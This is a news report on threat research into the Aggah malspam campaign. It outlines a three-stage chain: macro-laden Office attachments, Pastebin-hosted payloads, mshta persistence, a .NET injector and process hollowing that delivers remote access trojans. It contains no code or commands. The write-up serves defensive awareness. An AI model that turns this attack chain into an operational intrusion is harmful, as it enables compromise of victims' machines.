Security researchers have uncovered an upgraded version of the Aggah malspam campaign, which utilizes multiple Pastebin accounts to distribute several remote access tools (RATs), namely Agent Tesla, njRAT, and Nanocore RAT.
Ongoing since January, 2020, the Aggah campaign has been quite prolific recently with the attackers making use of their own infrastructure, as well as hosting sites such as Pastebin to host all the final RAT payloads.
The attack, which involves three stages, starts with a malicious email which appears to be legitimate, but at the same time is being vague and offers little to no content. A Microsoft Office document attached to the email contains VB macro script that is used to download the next stage of the infection and execute it on a victim’s computer.
“Once opened, the malicious VBA contacts a shortened "j.mp" URL (redirects to pastebin[.]com) that points to the next stage of the infection. The second stage of the infection (in fact all the subsequent stages) is hosted on Pastebin URLs,” the researchers explained.
“Newer versions of the macro also aim to establish persistence via the Windows registry for the second-stage payload's execution using mshta.”
The second-stage payload would configure a malicious scheduled task for another component, and then download and execute a .NET executable for Windows designed to disable security features to evade detection.
The third-stage payload is a VBScript designed to instrument a .NET based injector component that activates a RAT payload (the final stage) on the infected host.
The infection/injection process works as follows:
-
The Stage 3 payload VBScript downloads the injector instrumentation script from a Pastebin URL.
-
The injector instrumentation script decompresses the injector binary (a .NET based DLL) and loads it into memory ready to be executed via an exported API of the DLL. The RAT payload is then downloaded and decoded.
-
An API of the injector DLL is then called to inject the RAT payload into a specified benign process.
-
The API accepts a benign executable's name (such as "calc.exe"), spawns a new suspended process and uses process-hollowing to inject and activate the RAT payload on the infected endpoint.
At the final stage the Agent Tesla, njRAT, and Nanocore RAT malware is delivered on the infected computer.
“The actors behind this campaign are clearly motivated and continue to operate leveraging freely available infrastructure such as Pastebin, Bitly (j[.]mp) and others. We have also observed a steady evolution in their tactics ranging from modularization of their attack chains to antivirus evasion tactics to thwart detections. The fact that these actors continue to distribute a wide variety of malware indicates that they are constantly growing their malware arsenal,” the researchers concluded.